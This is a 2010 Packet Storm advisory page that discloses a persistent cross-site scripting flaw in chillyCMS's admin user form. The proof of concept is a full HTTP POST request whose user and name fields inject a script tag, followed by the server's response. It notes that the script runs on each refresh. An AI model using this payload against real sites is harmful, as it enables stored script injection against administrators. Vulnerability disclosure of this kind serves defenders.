Exploit the possiblities

Chilly CMS Cross Site Scripting

Chilly CMS Cross Site Scripting
Posted Mar 16, 2010
Authored by Pratul Agrawal

Chilly CMS suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
MD5 | e97b751f44416cb2cc09edb43df20446

Chilly CMS Cross Site Scripting

Change Mirror Download
                                     =======================================================================

chillyCMS Persistent XSS Vulnerability

=======================================================================





# Vulnerability found in- Admin module

# email Pratulag@yahoo.com

# company aksitservices

# Credit by Pratul Agrawal

# Software chillyCMS

# Site p4ge http://www.opensourcecms.com/demo/2/292/chillyCMS/

# Category CMS / Portals

# Plateform php



# Proof of concept #

Targeted URL: http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php


In ADD LINKS Field provide the malicious script to store in the Database.



=======================================================================
Request -
=======================================================================
POST /chillycms/admin/usersgroups.site.php HTTP/1.1
Host: demo.opensourcecms.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://demo.opensourcecms.com/chillycms/admin/userform.site.php
Cookie: __utma=87180614.1562082400.1268211497.1268727582.1268736168.10; __utmz=87180614.1268727582.9.6.utmcsr=php.opensourcecms.com|utmccn=(referral)|utmcmd=referral|utmcct=/scripts/details.php; __utmc=87180614; sid=c619059e8ecb02bfd5013f4cffe9f23f; PHPSESSID=d99927af4737c0c6df62d8f28bb1219a; CMSSESSID15baf25f=98ecec19a538065e285d7837054c7df9; ccc_lang=en; __utmb=87180614.6.10.1268736168; CCC_UID=c4ca4238a0b923820dcc509a6f75849b; CCC_CODE=7839a866ba37a8a0e8dbd669545b57d9
Content-Length: 154

user="><script>alert(123)</script>&name="><script>alert(123)</script>&pw=master&pw2=master&email=master%40yahoo.com&gids%5B%5D=2&status=1&language=en&getnewsletter=1&myaction=new&action=updateuser&id=

=======================================================================
=======================================================================
Response-
=======================================================================
HTTP/1.1 200 OK
Date: Tue, 16 Mar 2010 11:53:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6337
Content-Type: text/html




=======================================================================


After completion Just Refres the page and the malicious script get executed again and again.


#If you have any questions, comments, or concerns, feel free to contact me.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    0 Files
  • 17
    Jan 17th
    0 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close